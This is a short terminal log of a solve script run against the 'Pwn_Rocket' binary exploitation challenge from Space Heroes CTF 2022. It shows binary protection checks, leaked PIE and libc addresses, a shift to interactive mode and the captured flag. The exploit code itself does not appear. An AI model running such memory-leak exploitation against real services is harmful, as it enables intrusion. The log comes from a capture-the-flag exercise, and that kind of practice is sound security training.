mito@ubuntu:~/CTF/Space_Heroes_CTF_2022/Pwn_Rocket$ python solve.py r
[*] '/home/mito/CTF/Space_Heroes_CTF_2022/Pwn_Rocket/pwn-rocket'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Opening connection to 0.cloud.chals.io on port 13163: Done
[*] '/home/mito/CTF/Space_Heroes_CTF_2022/Pwn_Rocket/libc6_2.33-1_amd64.so'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
pie_leak = 0x55cc169fa0e0
pie_base = 0x55cc169f9000
puts_addr = 0x7feed8cebde0
libc_base = 0x7feed8c76000
[*] Switching to interactive mode

<<< Invalid Command.
shctf{1-sma11-St3p-f0r-mAn-1-Giant-l3ap-f0r-manK1nd}
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00